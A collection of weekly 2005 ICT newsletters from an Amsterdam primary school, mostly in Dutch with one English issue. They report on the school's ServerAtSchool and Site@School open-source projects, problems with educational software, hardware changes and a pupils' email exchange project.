Donderdag kwam een vijfkops afvaardiging van deze school uit Franeker kijken naar SAS. Twee directeuren en drie ICT-ers zagen hoe makkelijk het is om een computer weer als nieuw te krijgen (image terugzetten), beheer van leerlingen, toewijzen programma's etc etc.. Ze hadden gesprekken met Karin en Carol Moes van de Joop Westerweelschool en kregen door de uitgebreide voorlichting een goed beeld van SAS. Ze waren zeer enthousiast.

ARTIKEL IN LINUX MAGAZINE

De demonstratie van SAS levert een artikel op in Linux Magazine, het Neerlandstalige Linux blad. We kregen van Sander, de hoofdredacteur, de tekst toegestuurd. WoW! Prima artikel en zeer complimenteus over SAS. Een quote tot slot:
"ServerAtSchool is een project met een toekomst. Op dit moment is het gereed voor gebruik binnen scholen, en is het helemaal toegerust voor die taak. Dat geeft het een flinke voorsprong op andere aanbieders en op zelfgebouwde netwerken. Makkelijk in het gebruik, goed gedocumenteerd, continuïteit gewaarborgd. ServerAtSchool is een project dat door schoolbesturen terdege in de gaten zal moeten worden gehouden."
Het artikel verschijnt in april.

groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-03-11 w10

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 10 - 2005 (11 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Letterpret

De problemen met het leerkrachtengedeelte zijn waarschijnlijk intern. Dus we mopperen deze week maar niet op Malmberg. Maandag wordt het uitgezocht.

Berenproject

Er wordt flink heen en weer gemaild tussen Friesland en Amsterdam. Foto’s zijn te zien op de website: www.rosaboekdrukker.net. Klik op de tekening van de beer.
Het werkt aanstekelijk in de school, want in groep 3 willen ze nu ook een beer mee naar huis.

Paint

Deze week leerde Karin van een leerling van 7 jaar de knoppencombinatie CTLR-Z in Paint. Nooit te oud om te leren. En kijk eens wat een fantastisch werk er gemaakt word!
http://www.rosaboekdrukker.net/index.php?page=615&navpath=,3342,3676&contents= 4157,4158,4159,4160,4161,4162,4164,4165,4167,4168,4171,4172,4173,4174&section=15&ID= 4172&gallerypage=1
Wat zijn die kinderen al vaardig. Sommigen hebben meteen door wat je moet doen bij het opslaan van het werk. Ook nieuwe kleuren maken in Paint had een stel kinderen zo door.

Veilig internet?

ICTopschool stuurde deze week hele leesbare en nuttige folders met informatie over veilig internetten en sp@m. Meer informatie is te vinden op de site: http://www.ictopschool.net/snel/veilig. We hebben per email de folders besteld voor alle leerkrachten.

Site@School

Gisterenavond had het kernteam van S@S zijn bedrijfsuitje. We combineerden het nuttige met het aangename.
Nuttig: de koppen bij elkaar steken over de toekomst van S@S.
Aangenaam: we aten Indiaas. Verder niet gekart (mag Dirk niet aan meedoen) of steengegrild (teveel rook voor Fred).
Conclusie: We zitten een volwassen wordend project. De snelle ontwikkeling is voorbij, we mikken op duurzaamheid, stabiliteit en de lange termijn.
Los hiervan: Deze week schrokken we omdat de mensen die de tekstverwerker van S@S maken en ondersteunen ruzie met elkaar kregen. De editor zou niet meer ondersteund worden. Ziehier de kracht van Open Source. Binnen twee dagen had één van de ondersteuners zich tot nieuwe onderhouder van het project opgeworpen en hij verzekerde de wereld dat het gewoon onderhouden zou worden. De nieuwe editor heeft een Word-code strip functie die het mogelijk maakt dat je Word docs zo in S@S zet.

S@S documentatie voor leerkrachten en leerlingen

Uit België kregen we bericht van Kurt, sysadmin van 'De Meidoorn' in Eeklo: Surf naar www.digitaleschool.be <http://www.digitaleschool.be/>
Klik op eKopie en ICT
Daar staat een install en gebruikershandleiding ter beschikking.
Kurt heeft aangeboden om als verzamelpunt te dienen voor Nederlandstalige gebruikershandleidingen (bijvoorbeeld verkorte aanwijzigen voor leerlingen ed.d). Mocht je leerling- of leerkrachtmateriaal hebben, stuur het hem.

ADSL

Zo zouden wij onderlaatst ADSL van PTT krijgen. Er kwam een monteur. Hij had het al voor -tig scholen aangesloten. Bij ons werkte het niet. Bellen met de PTT. Testen. Er onbrak een kastje in de PTT-centrale zei de heer. Na twee dagen hadden we ADSL; het onderwijsaanbod. Nu gaan we leuke dingen verzinnen, want we houden onze kabelaansluiting bij A2000. Wie heeft een goed idee voor ons tweede IP adres? Wie weet simpele oplossingen voor load balancing? Een tweede server? Een honeypot project?
Op zoek naar een wereldidee... het moet wel voor basisscholen zijn.

SWITCHES

De nieuwe Netgear switches zijn in gebruik genomen. Alle patchkabels losgemaakt, oude switch eruit en de nieuwe erin. Vervolgens alle patchkabels opnieuw erin volgens een systeem: We hebben twee aansluitingen per klas. We hebben twee switches.
De ene aansluiting in switch 1, de andere in switch 2.
Gaat er een switch stuk, dan heb je in een klas nog steeds één werkende client.
De rijtjes van 6 computers op de 1e en 2e verdieping hebben we om en om op de switches gezet. Zo maak je het de klassen iets minder switchafhankelijk. In de kantoren hebben we de computers ook over de switches verdeeld.

ServerAtSchool

Vanaf heden heet Server@School 'ServerAtSchool'. Peter is druk met het schrijven van de installatiehandleiding. We hebben het eerste stukje gezien en zijn zeer onder de indruk.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-03-18 w11

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 11 - 2005 (18 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

SAMSAM

Deze week ontvingen we een email van de redactie van SAMSAM, dat het werkstuk van groep 8 eindelijk op het internet stond.
Wel bekijken met een Internet Explorer browser, want met Firefox lukt het niet:
http://samsam.kennisnet.nl/brievenrubriek/rubriek.asp?id=1064697404797
Mocht het niet lukken: www.samsam.net  Kijk bij fantasieland.

Opruiming

In de hal bij ons op school hebben we een tafel ingericht met weg te werken apparatuur. We zijn al een paar monitoren van mindere kwaliteit (fletse beeldkwaliteit) kwijt aan ouders van leerlingen.

ICT LEERLIJN

Letterpret.

Er zijn problemen met de database. Daar worden de gegevens van de leerlingen opgeslagen. Volgens onze deskundige is die database CORRUPT. Als er verkeerd wordt afgesloten, of een computer loopt vast, dan kan niet meer bij de resultaten van de leerlingen gekeken worden.

Malmberg probeert het op te lossen......

Binnenkort (=volgende week) beslissen we of we nog langer met dit programma zullen kunnen werken. Een scholing gaat weer verloren. Die is gepland op 29 maart en zou de onderbouw leerkrachten ondersteunen in het gebruik van het programma tbv de taallijn.

Veilig Internetten

De folders waarover vorige week in deze nieuwsbrief werd gesproken (over sp@m en veilig internetten) zijn binnengekomen. Ze zullen worden verspreid in onze school. De leerkrachten wordt dringend verzocht ze goed te lezen en de leerlingen erover te vertellen.

TECHNIEK

ServerAtSchool

Ziehier het artikel dat St. ICTopschool schreef:
http://www.ictopschool.net/infrastructuur/nieuws/Nieuwsbericht.2005-03-15.4705
Zeer bedankt Raoul voor je enthousiaste stuk.

Violenschool

Deze week kregen we de Violenschool uit Hilversum op bezoek. Peter en Dirk gaven een demo en men was zeer enthousiast, ook over de prijs. Binnenkort gaan we op de Violenschool kijken. Het lijkt erop dat de bal gaat rollen...

Site@School

De release datum nadert... Fred probeert de nieuwe editor goed werkend te krijgen, zo dat die nog meekan met V2.3. Hoop werk omdat er verschillen zijn tussen Internet Explorer en Firefox.
Leerlingen van de Christschool in Florida: http://www.thechristschool.org/ gaan het manual corrigeren op Engels. We zijn ontzettend blij met dit initiatief. Niet alleen omdat het manual er beter van wordt, maar vooral omdat het zo'n zinvol project is voor leerlingen. Zo doen ze echt werk. Wederom de kracht van OSS.

Nogmaals Letterpret.

De database (Paradox; reeds ter ziele) is corrupt. Uitgever en helpdesk hebben geen tools om de database te repareren. Hier wreekt zich weer dat het geen echte netwerksoftware is. De database moet een crashende client kunnen overleven. Het lijkt erop, dat dat een structureel probleem gaat worden. Wat een brakke software! In educatieve software zou je een text database verwachten die met een tekstverwerker is te repareren.

We zijn aan het opruimen.

Te koop:
Promise FastTrak TX 2000 Raid Controller Card (Ultra ATA/133 met 2 Super Swap racks.
Als experiment een paar keer gebruikt. Verder nieuw.

Groet en prettig weekend,
Karin,
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-03-24 w12

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 12 - 2005 (24 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Korte week, weinig nieuws. Weinig tijd, het lekkere weer lonkt.

ICT LEERLIJN

Deze week is er een aantal afspraken gemaakt om de stand van zaken m.b.t. de ICT leerlijn onder de loupe te nemen. De ondersteuning van de onderwijsbegeleidingsdienst is overgenomen door vier verschillende mensen en dat maakt de coördinatie wat moeilijker.

Berenproject

Het emailen gaat redelijk met Franeker. Alleen hebben ze daar af en toe een haperende computer.

Malmberg - Letterpret

Na de paasdagen volgt weer een smakelijk verhaal.

TECHNISCH

Site@School

TV module:
We hebben een werkende tv module. Hij is nog experimenteel, en komt niet in v2.3, maar het resultaat is zeer opwindend. De kick: Je kunt in S@S beheer het beeld op de monitor laten wisselen. Kortom, je kunt op afstand bepalen welk beeld de televisie (bij ons in de hal) vertoont. Bijvoorbeeld:
Van 8.00 tot 8.20 de mededelingen voor leerkrachten.
Van 8.20 tot 8.35 de mededelingen voor ouders
Vanaf 11.30 tot 11.45 de foto's van het kinderuitje,
etc. etc.

ServerAtSchool

We werken full speed aan de installation guide.

Prettig weekend, zalich pasen.
Groet, Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-03-31 w13

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 13 - 2005 (31 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT leerlijn

Letterpret

We hadden een bijeenkomst om meer te weten te komen hoe Letterpret aansluit bij ons taalaanbod aan de kleuters. Helaas ontdekten we bij de voorbereiding van deze bijeenkomst, dat er toch nog technische mankementen zijn aan het programma. Namelijk: bij het verkeerd afsluiten, stroomstoringen, vastlopen van een computer  of onjuist gebruik van een computer kan de verbinding met de database kapot gaan. (In de database worden de resultaten van de leerlingen opgeslagen.) Bij 3 van de 6 kleutergroepen was dat het geval.
Tijdens de bijeenkomst hebben we ons beraden. Wat gaan we doen: na ruim twee jaar modderen met letterpret: een ander programma? Het blijft moeilijk een zo leuk programma weg te gooien. Er is besloten om het nog een maand extra goed te bekijken – met in het achterhoofd: waar moet een eventueel volgend programma aan voldoen?-
De drie groepen die een CORRUPTE DATABASE hebben zullen opnieuw worden ingevoerd.
NB. Tijdens de bovengenoemde bijeenkomst kwam aan de orde, dat we eigenlijk door alle technische problemen nog nooit toegekomen zijn aan het juist gebruiken van het programma. We worden nu begeleid door een taalspecialist, die ons wees op de mogelijkheden van het programma. Ook zagen we wat er gebeurt als je het programma niet goed instelt: dan worden de oefeningen te moeilijk voor sommige leerlingen
Last but not least: vorige week ontvingen we de zoveelste betalingsherinnering voor het gebruik van Letterpret. Het lijkt wel alsof al onze post niet aankomt bij de afdeling debiteuren. Net als bij de helpdesk lijkt men wel Oost-Indisch doof, of men spreekt/leest er alleen Pools ofzoiets. (in Polen wordt namelijk educatieve software geherprogrammeerd)

DIGIWIJZER

In groep 6 t/m 8 wordt voor de ICT leerlijn gebruik gemaakt van het programma Digiwijzer. Daarmee leren de leerlingen gericht zoeken op het internet. Er is een nieuwe module klaar. Die wordt volgende week geïnstalleerd. Er zijn afspraken gemaakt met de leerkrachten uit de bovenbouw: hoe staat het ervoor? Hoever zijn jullie met de leerlijn. Dus in plaats van een groepsbijeenkomst zal de scholing nu op maat per leerkracht plaatsvinden.

TECHNISCH

ServerAtSchool

Feest ten burele van ServerAtSchool. De tweede klant is binnen. Het bestuur van De Opslach (de school waarmee we ook het berenproject doen), komt de gelederen van STRICT versterken.
Deze week voerde de afdeling 'verkoop' gesprekken met drie scholen. Allen zeer geïnteresseerd.

Site@School

Een grote sprong voorwaarts! In 2.3 komt en nieuw educatief hoogstandje: Samenwerken aan pagina's.
Je kunt een 'project' aanmaken waarmee een aantal leerlingen gezamenlijk pagina's kunnen beheren. We zitten nog wat te puzzelen op het probleem hoe te voorkomen dat twee leerlingen tegelijkertijd aan dezelfde pagina werken en dan gaan opslaan. Vindt Fred vast wat moois op.
Nu wordt teamwork mogelijk. En dat vroeg de maatschappij toch?

Groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-04-08 w14

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 14 - 2005 (8 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT LEERLIJN

Voorbereidingen evaluatiedag Op 19 april hebben we op school een evaluatiedag. Dan wordt o.a. ons ICT beleid van dit schooljaar bekeken. Wat waren we van plan? Hoe gaat het? Wat kan er beter? En hoe zullen we het volgend jaar aanpakken.
Om deze dag voor te bereiden ging Karin daarvoor deze keer niet naar de vertrouwde plek van de onderwijsbegeleidingsdienst (in het gebouw van het ABC), maar naar een gebouw waar allerlei facilitaire onderwijsinstellingen zitten. (o.a. het AOB, OOG, en CIAO.)
In dat gebouw gaan de zonweringen vanzelf omlaag.

Letterpret.

Nog één maal gaan we alles proberen.
Daarom moeten alle leerlinggegevens worden ingevoerd op de computer van waaruit de images worden ge-upload. ( Een soort moeder computer) Dat had Karin niet goed begrepen. Dus moet alles weer over.
Dit is echt de laatste keer dat er zoveel tijd in dat programma wordt gestoken.

Beeldbank

Er is een site van de schooltv, genaamd BEELDBANK, waarop je allerlei filmpjes kunt bekijken. Ze geven ook een nieuwsbrief uit.
Maar bij ons op school werken die filmpjes niet. We hebben Windows Mediaplayer 7.01 geïnstalleerd.
Weet iemand hoe het wel lekker werkt?

Kinderboeken

In het COS magazine van maart staat een link naar www.kinderboekenplein.nl. Daarin is van alles te vinden over kinderboeken en schrijvers. Leuk is ook dat er allerlei top-tiens zijn (top-tien LEUK, top-tien SAAI etc.). Kinderen schrijven er zelf recensies.

TV

Er is een tv gekocht. Die komt in de hal van de school. Een installatiebureau zal deze 70 cm tv ophangen. Er komt een verbinding naar een computer die op het netwerk is aangesloten. Op die tv zullen allerlei mededelingen voor ouders worden weergegeven. Dus iedereen die de school binnenkomt ziet op dat scherm wat er aan de hand is.
In week 14 zal het geheel werken. S@S bestuurd!!!!
Voor degenen die dit kunstje ook willen, hier wat gegevens en handigheidjes om te onthouden als je de tv koopt:

- TV, 70 cm (de grootste in 'ouderwetse' tv's) Dus geen dure computerschermtv o.i.d.
- Speakers aan de voorkant (dan straalt het geluid de hal in, i.p.v. naar de muur)
- ingangen: 1 x voor de kabel (de hf ingang), 3x video (composiet) namelijk 1 x voor een dvd speler, 1 x voor de computer en een voor een ouderwetse VHS player.
- Als de afstandbediening stuk gaat o.i.d. moet de tv nog te bedienen zijn met de hand. Een nieuwe afstandbediening kost ongeveer 20 euro en is een standaardding.
Kosten van de tv ongeveer 400 euri
Omdat we de tv willen hebben hangen bovenin de hal, en een 70 cm tv nogal zwaar is, moesten we een stevige en zwenkbare ophangbeugel hebben. Kosten ongeveer 125 euri.

Het leuke is dat er mededelingen op kunnen, maar ook foto's, eductieve films, kleine videootjes, etc. etc.

TECHNISCH

ServerAtSchool

Deze week hadden we twee gesprekken met scholen; beiden zeer geinteresseerd.

De internationale versie vordert. Peter breidde het EDEX import tool uit tot een universele leerlinggegevens import functie. En, let op Nederlandse scholen, het is nu ook mogelijk om nieuwe leerlingen via EDEX te updaten!

Je kunt dus bijvoorbeeld 1 x per maand het EDEX bestand aan Janitor geven, de nieuwe leerlingen worden automagisch aangemaakt.

Verder hebben we een universiteit bereid gevonden om het CD'tje met de internationale versie te hosten.

Site@School

We werken rustig toe naar de 31 mei.
Volgende week meer.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-04-15 w15

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 15 - 2005 (15 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

This English issue of our IT weekly newsletter is larger than normal and specially made for "The Christ School", Orlando, Florida, USA.
For further details, please read on.

Assistance by the Educational Facilitation Service [1]

This week two groups in our school were assisted by the EFS in working with a program with which children learn to search in web pages and on the Internet. Our problem is mainly: how to organize the activities in a school day in a way that computers are integrated in the regular curriculum.

E-mail project

In our group 4 the e-mail project is ending. Soon the bears will go back to their own classes.[2]

Letter Fun

The “language” software program for our youngest pupils, that causes us so much frustration, is waiting for its final test. All names have (for the umpteenth  time....) been put in the database. We are all going to make a new, but final start. If we again come upon new difficulties we are going to look for a new program.

Notice board.

This week the ICT dept. received  -at last- our notice board. We have quite some lack of space on our desks and we needed this board to keep track of our missions. Here you can see it: http://www.rosaboekdrukker.net/index.php?page=615&navpath=, 4371&contents=4372&section=15&ID=4372&gallerypage=1

Font Size

In the image for our computers we had an irritating issue. The standard font size of the browser was very large. That way our own website ran out of the screen. This week it was altered, so that also the pictures on our site can be totally seen.
(Dirk: my fault, I set the font size to maximum enlargement).

Mathematics Software

We bought a new software program for kids that have difficulties with arithmetics. It’s a remedial program.

Printer-jamming

The printer on the second floor of our school was out of order this week. Our technical support was able to reset everything from distance.

Save your old documents!

Since september 2004 we have the new ServerAtSchool. Your old data were made available for you to copy them to your new location.
WHEN YOU DID NOT DO THIS, YOUR OLD DATA CAN GET LOST!! At the 5th of May (Liberation Day, when  the  Netherlands were liberated by the Americans in 1945) we will delete the old server data. When you have trouble recovering your data, ask Karin or Dirk

Workstation in Koen's class

We use P2 400, donated by a municipal service. One broke down, Dirk replaced the power supply and thanks to SABRINE, immediately a new image.

APS IT services

It is virtually impossible to understand the fine print in the contract of our National Schools Microsoft software supplier. Of course, illegal use is forbidden, but legal use of Microsoft in schools is almost impossible without APS IT Services. So, annually, we report the number of computers, how many full-time jobs we have in the team, etc. In total we pay about €700 (about $ 900) for 50 computers per year.
When you got your computers as a donation, they make problems, when they are better than P2 they make problems, etc.
Gradually we come to the conclusion that it's cheaper to buy normal licenses and forget about APS-IT services. Or would that be forbidden? Karin pulls her magnifying glass and starts reading the super fine print.

ServerAtSchool

The server system that is developed at the public primary School Rosa Boekdrukker had a two page article in the Dutch Linux Magazine of april 2005. The editor was enthusiastic about the system and its possibilities for primary schools. Buy this issue of the Linux Magazine! You also find good article on Open Office.org 2.0; the replacement for Microsoft Office 2003. We will start using OOo after the summer holidays.

This weeks activities:

- We were at a school in the northern part of Amsterdam to 'sell' SAS. They like our approach to use second hand workstations and the simplicity of our approach.

- A school in Hilversum will deploy ServerAtSchool. They have a lot of Mac's and Peter has some extra work to do to integrate the Mac's in SAS.

- When restoring an image on a client we found a strange error message in the log files. A call to the help desk, and Peter in Bussum connecting to the client revealed the problem; a misconnected harddisk cable. It's the strength of this system that problems can be solved over the phone.

- Last Friday we had a meeting of the cooperation of schools that uses SAS. The name of the group is now, (thanks to Ton):
STRICT: Scholen Tezamen Rijk met ICT (English: Schools Together Rich with Information and Communication Technology). ICT is a common name in the Netherlands for what the rest of the world names   'IT'.

Site@School

At this moment pupils in the 8 th grade of 'The Christ School' in Orlando, Florida, USA,  are proofreading and correcting the S@S manual.

Thanks to the precise work and sharp eyes of Alex, Alice, Amy Morgan, Angela, Ann Kallyn, Chelsea, Julie, Matthew, Micah and Taylor the manual of the 2.3 version will be in correct English.
The S@S team expresses its gratitude to the pupils and the teacher (Rich Magee) who all made this great improvement possible.
Maybe it's also an idea to have a look at the English in S@S itself for the next version?
And, last but not least, Dirk learns a lot too. Hopefully his English will improve, at least his 'its' and 'it's'.

The S@S TV module

is now operational. In the hall of our school we have a television set. With an old computer, a cheap tv video card and Site@School we have a message system that is low-cost and easy to manage (from home). We can show messages, pictures, videos, etc.
The release date of version 2.3 is slowly approaching. We released a new beta version for our testers. At many places in the world people are working now on the translations. We are grateful for so much help and encouragement.

Have a nice weekend,
Karin,
Dirk

[1] Educational Facilitation Service: A foundation that helps schools with integrating new methods, school plans, learning disabilities, and all kind of problems trhat schools run into.

[2] The Bears Project: A teddybear from a school in the  Northern Part of Holland stays a couple of weeks in our school. Every afternoon the bear goes home with another pupil and spends the night there. The bear tells her/his adventures by email to the other school. And vice versa. It helps children to write texts and communicate by email.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-04-22 w16

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 16 - 2005 (22 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week een korte BIC. Twee redenen. We wilden eens een positieve BIC en we hebben niet zoveel tijd omdat we het jaarlijkse teamuitje hebben.

ICT EVALUATIEOCHTEND

Deze week hebben we met het hele team ons ICT onderwijs onder de loep genomen. Er werd getoond wat er gedaan was, er werden suggesties gedaan hoe het beter kan en er werden veel wensen geuit over wat men nog wil leren. Al met al was het een hoopgevende bijeenkomst. Ondanks dat ons team uit veel oudere leerkrachten bestaat, is ICT hier springlevend.

LEESLADDER

Door een verkeerde muisklik wiste Karin een hele groep in de Leesladder. Bij terugzetten bleek dat LL een uitstekende backup-voorziening heeft. Er zijn meerdere backups beschikbaar.
Binnen een kwartiertje was de zaak teruggezet en had Karin haar gegevens weer. Onze Helpdesk medewerker Peter was zeer over Zwijsen te spreken.

COMPUTER AGNES

Wilde niet meer opstarten met een vage melding over een corrups hupperdepup.exe file. Windows opnieuw installeren. Gelukkig had ze met SABRINE in no time weer een 'nieuwe' computer.
De snelheid, eenvoud en gemak van deze software verrassen ons iedere dag weer.

MUIS RONALD

Ronald zijn muis deed het opeens niet meer. Hij heeft zo’n draadloos ding. (waar is dat nou handig voor???) Lag het aan de batterijen? Dus de batterijen van Agnes d’r muis maar geprobeerd: ja, daar lag het aan. Gelukkig ondersteunt de afdeling ICT alleen positief geadviseerd materiaal en hoefden we er niets aan te doen. Ronald loste het zelf op.

Tot zover de BIC, we gaan bikken
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-04-29 w17

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 17 - 2005 (29 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BERENPROJECT

Het berenproject in groep 4 is afgelopen. Snuffeltje is weer bij ons terug en Joey-Fleur is ook weer veilig in Franeker. Wij vonden het een reuze succes en zijn trots, dat de leerlingen al zulke lange brieven kunnen schrijven. Ook mailen met een school zo ver weg is spannend.
Voor herhaling vatbaar!!

ICT bijeenkomst groep 3, 4 en 5

Deze week hadden we een bouwvergadering die helemaal in het kader van onze ICT leerlijn stond. Jan van “Stampei” (samenwerkingsverband tussen CIAO en het ABC, de Amsterdamse schoolbegeleidingsdienst. Afkorting van STeunpunt AMsterdams Primair onderwijs voor Educatie en Ict, http://www.edu.amsterdam.nl/) adviseerde ons en deed suggesties. We hebben afspraken gemaakt hoe we onze lessen beter kunnen organiseren en welke onderwerpen er nog aan bod moeten komen. Eind mei komen we weer bij elkaar om te kijken of de afspraken hebben geholpen. We zullen o.a. gaan uitzoeken welke manier van registratie ons het beste bevalt. Welke kinderen hebben welke oefeningen gedaan en welke vaardigheden worden beheerst? En komen ze regelmatig aan de beurt?

Digiwijzer in de bovenbouw

Ook in groep 7 zijn deze week door de schoolbegeleidingsdienst afspraken gemaakt voor klassenconsulten voor het gebruik van Digiwijzer. Module 2 is nu in gebruik genomen door groep 7 en 8. Groep 6 is nog bezig aan module 1.

Prijs in groep 8

Groep 8 deed mee aan een wedstrijd voor het tijdschrift Sam Sam (zie nieuwsbrief 11: http://www.rosaboekdrukker.net/index.php?section=6&page=675&option=view&newsletter_id=48)
Ze hebben de eerste prijs gewonnen met hun fantasieland. Zie foto’s
(http://www.rosaboekdrukker.net/index.php?page=615&navpath=,2646,4529&contents=4530,4531,4532&section=15&ID=4531&gallerypage=1)

COMPUTERS NAAR FRANEKER

Dirk's kelder begint een beetje leger te raken.
Matthijs en zijn vader zijn met een aanhangwagen naar Amsterdam gekomen om 21 Dell computers, monitoren, toetsenborden etc. op te halen. Dit materiaal, afkomstig van onze gemeentelijke dienst, is hetzelfde als wat wij op school gebruiken.
Prima stuff dus.

groeten en prettige oranjevieringen,
vooral in de Koniginnenach
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-05-13 w19

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 19 - 2005 (13 mei)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++
Wachtwoorden

We overwegen om, voor intern gebruik (documenten op de server), betere

wachtwoorden voor de leerkrachten te kiezen. De wachtwoorden zijn nu te eenvoudig en dat is een keus die we achteraf betreuren. Want ze zijn te gemakkelijk te raden. Voortschrijdend inzicht.

Uitloggen

Niet alleen inloggen, maar ook UITLOGGEN
Een leerkracht kon niet meer met Word werken. Desktop icoon verdwenen. Oorzaak: onbekend. Hij vermoedt dat het komt doordat hij zijn computer heeft achtergelaten zonder uit te loggen en dat een ander toen is gaan rommelen aan zijn bureaublad. De bureaubladen van de leerlingen staan vast, maar die van de leerkrachten niet.
De afd. ICT wil jullie er graag nog een keer aan herinneren dat niet uitloggen ON-veilig is. Anderen kunnen dan bij je documenten.

Leesladder probleem

Deze week ging er weer iets mis met de Leesladder. En weer waren de gegevens van groep 3 niet te bereiken. We denken dat het te maken heeft met ONGEDULD bij het trage opstarten van het programma. De leerlinggegevens moeten van de server gehaald worden. Als een kind (of leerkracht) dan nog een keer gaat klikken start het programma dubbel, en dat kan natuurlijk niet. Gelukkig kon de backup snel worden teruggezet. Advies: laat een leerkracht het programma klaarzetten. Opstarttijd varieerde van 17 tot 27 seconden. Dus een halve minuut wachten. Ja, geduld is een schone zaak.

Telewerken

Leerkrachten bij ons op school hebben de mogelijkheid om van thuis uit te werken met hun documenten op de schoolserver. Met een heel simpel programma (WINSCP) en een simpele handeling in “janitor” (ons beheersprogramma) kunnen we bij al ons werk. Het is dus niet meer nodig documenten van en naar school te mailen. Bovendien kunnen we met webmail ook thuis onze mail afhandelen

TECHNISCH

Site@School

Als de kat van huis is....
Fred is op vakantie. Als hij thuiskomt zal hij een overvolle mailbox vinden want het was zeer druk op het Forum. Tovenaarsleerling Dirk hield zich gedeisd dus er ging niet veel mis.
Het corrigeren van het manual door de leerlingen van de school in Florida verloopt voorspoedig en zal op tijd afkomen.
De releasedatum van 2.3 nadert....

ServerAtSchool

Deze week kwamen de ICT'ers van een bestuur in Horst langs voor een demonstratie. Ze vonden 't wel een mooi systeem dat een aantal van hun problemen zou kunnen oplossen. Jammer dat ze weinig tijd hadden.
We werden benaderd door Didaktief voor een telefonisch interview over SAS.
Een school in Hilversum gaat niet verder met SAS. De school heeft 60 Mac's en vond een oplossing voor hun server door middel van MaC software die in België met steun van het ministerie van onderwijs ontwikkeld is. Een terechte keus en we zullen zeker nog van ze horen.

Groeten en prettig weekend
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-05-20 w20

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 20 - 2005 (20 mei)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Leerlijn

Aabeecee digitaal

De firma INSTRUCT (www.instruct.nl) heeft een programma waarmee de leerlingen allerlei vaardigheden kunnen leren op de computer. Dat programma is in een nieuw jasje gestoken en kan via het internet gedaan worden. Je betaalt dan per module een jaarschoollicentie. In ons geval iets van 62 euro per jaar. Een demo is te zien via de volgende link: http://www.instruct.nl/sf35/sf.mcgi?1118
Misschien is dit wel een prima methode voor ons om te gebruiken, omdat leerlingen er in eigen tempo en op eigen niveau aan kunnen werken. En de registratie zit er ook bij!!
Is er al iemand in het land die er ervaring mee heeft?

Printerleed

De printer op de tweede verdieping houdt er om duistere redenen af en toe mee op; er kan dan niet meer geprint worden. Hoogst irritant.
We hebben er een andere printer neergezet. Aanpassingen aan de server op afstand door Peter gedaan.
Verder op de eerste verdieping nieuwe cartridge in de printer.

AutoHotkeys

We vonden een programma dat je vele toetsaanslagen en muisklikken kan besparen:
http://www.autohotkey.com/
Voorbeeldje: onderstaande tekst telkens typen door de Alt en de 'a' toets te gebruiken:
'Wij wensen u veel succes bij het zoeken naar een nieuwe baan.
Met vriendelijke groet,
etc.'
Het programma is OSS, goed gedocumenteerd en kan zelfs de muiscursor op een bepaalde plek op het scherm zetten.

Technisch

ServerAtSchool

Peter en Dirk waren op 'de Opslach' in Franeker voor de 'schouw'. We hebben alles bekeken en precieze afspraken gemaakt met met Matthijs en Joke. Matthijs wil graag veel zelf doen, en dat kan gelukkig met SAS.

Server overleden

Door een stroomstoring raakte één van de servers van de Joop Westerweel zodanig defect dat de harddisk overleed. Dankzij het prima backupsysteem kon Peter in recordtijd de data terugzetten op een andere server. Het was wel schrikken, want het ging om alle gegevens van ESIS.
